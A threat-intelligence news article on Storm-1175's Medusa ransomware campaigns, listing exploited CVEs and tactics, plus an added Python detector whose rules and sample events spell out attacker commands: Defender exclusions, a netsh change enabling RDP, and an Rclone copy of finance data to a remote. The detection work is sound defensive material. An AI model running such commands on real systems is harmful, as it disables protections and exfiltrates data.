
China-based threat actors known for deploying Medusa ransomware are said to be involved in weaponizing a combination of zero-day and N-day vulnerabilities to orchestrate “high-velocity” attacks and compromise vulnerable internet-connected systems.
The Microsoft Threat Intelligence team said, “Due to the attackers’ high operational tempo and proficiency in identifying exposed perimeter assets, recent intrusions have had a significant impact on healthcare organizations as well as the education, professional services, and financial sectors in Australia, the United Kingdom, and the United States.”
Storm-1175 attacks leverage recently published vulnerabilities and, in some cases, pre-public zero-day exploits to gain initial access. Some incidents include attackers chaining together multiple exploits (such as OWASSRF) for post-compromise activity.
Once financially motivated cybercriminals gain a foothold, they move quickly to steal data and deploy Medusa ransomware within days, or in some incidents, within 24 hours.
To aid in these efforts, the group establishes persistence by creating new user accounts, deploys web shells or legitimate remote monitoring and management (RMM) software for lateral movement, steals credentials, and disrupts the normal functioning of security solutions before dropping ransomware.
Storm-1175 is believed to be associated with over 16 vulnerability exploits since 2023.

CVE-2025-10035 and CVE-2026-23760 are both said to have been exploited as zero-days before they were publicly disclosed. Since late 2024, the group has also demonstrated a talent for targeting Linux systems, including exploiting vulnerable Oracle WebLogic instances across multiple organizations. However, the exact vulnerabilities weaponized in these attacks are still unknown.
“Storm-1175 takes advantage of a period when many organizations are unprotected to rapidly rotate exploits between publication and patch availability or adoption,” Microsoft said.
Some of the notable tactics observed in these attacks are:
Using living-off-the-land binaries (LOLBins) such as PowerShell, PsExec, and Impacket for lateral movement.
Relying on PDQ Deploy for both lateral movement across the network and payload delivery (such as Medusa ransomware).
Modifying Windows Firewall policy to enable Remote Desktop Protocol (RDP) so that malicious payloads can be delivered to other devices.
Dumping credentials with Impacket and Mimikatz.
Configuring Microsoft Defender Antivirus exclusions so that ransomware payloads are not blocked.
Using Bandizip and Rclone for data collection (archiving) and exfiltration, respectively.
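As an added example (not from the Microsoft report or this article), the following Python scans constructed process-creation records for the three tactics above that leave command-line evidence: Defender exclusions being added, Windows Firewall changes that allow RDP, and Rclone being invoked to move data. The record format, hostnames, users and paths are invented stand-ins for the fields a defender would take from Security event 4688 or Sysmon event 1; the rule names are assumptions.

```python
import re

# Detection rules: (name, regex applied to the lower-cased command line).
RULES = [
    # A Defender exclusion added so a staging path or process is never scanned.
    ("defender_exclusion_added",
     re.compile(r"(add|set)-mppreference\b.*-exclusion(path|process|extension)\b")),
    # Windows Firewall policy changed to allow inbound RDP (port 3389 or the
    # "Remote Desktop" rule group), via netsh or the NetSecurity cmdlets.
    ("firewall_rdp_allowed",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+(add|set)\s+rule\b.*"
                r'(localport=3389|group="remote desktop").*(action=allow|enable=yes)'
                r"|enable-netfirewallrule\b.*remote desktop")),
    # Rclone invoked to copy or sync data to a remote: the exfiltration step.
    ("rclone_exfil_tool",
     re.compile(r"(^|[\\/\s])rclone(\.exe)?\s+(copy|sync|move)\b")),
]

def parse_event(line):
    """Parse one constructed 'host=<h> user=<u> cmd=<command line>' record; None if malformed."""
    m = re.match(r"host=(\S+)\s+user=(\S+)\s+cmd=(.*)$", line.strip())
    if not m:
        return None
    return {"host": m.group(1), "user": m.group(2), "cmd": m.group(3)}

def scan(lines):
    """Return (host, rule, command_line) tuples; routine admin commands yield none."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:          # malformed telemetry is skipped, not fatal
            continue
        lowered = ev["cmd"].lower()
        for name, rx in RULES:
            if rx.search(lowered):
                hits.append((ev["host"], name, ev["cmd"]))
    return hits

# Constructed sample telemetry; hosts, users and paths are invented.
SAMPLE_EVENTS = [
    "host=WS01 user=CORP\\jdoe cmd=powershell.exe Get-MpPreference",
    "host=WS01 user=CORP\\jdoe cmd=powershell.exe Add-MpPreference -ExclusionPath C:\\Temp\\stage",
    'host=FS02 user=SYSTEM cmd=netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes',
    "host=FS02 user=CORP\\svc_backup cmd=C:\\Tools\\rclone.exe copy D:\\Finance remote:bkt --transfers 8",
    "malformed record with no fields",
]

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
```

The benign Get-MpPreference query produces no hit, while the exclusion, firewall and Rclone commands each produce one, which is the separation a detection rule set needs before it can page anyone.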
The larger implication here is that RMM tools such as AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect, and SimpleHelp are becoming dual-use infrastructure for covert operations, as threat actors can mix malicious traffic into a trusted, encrypted platform to reduce the likelihood of detection.
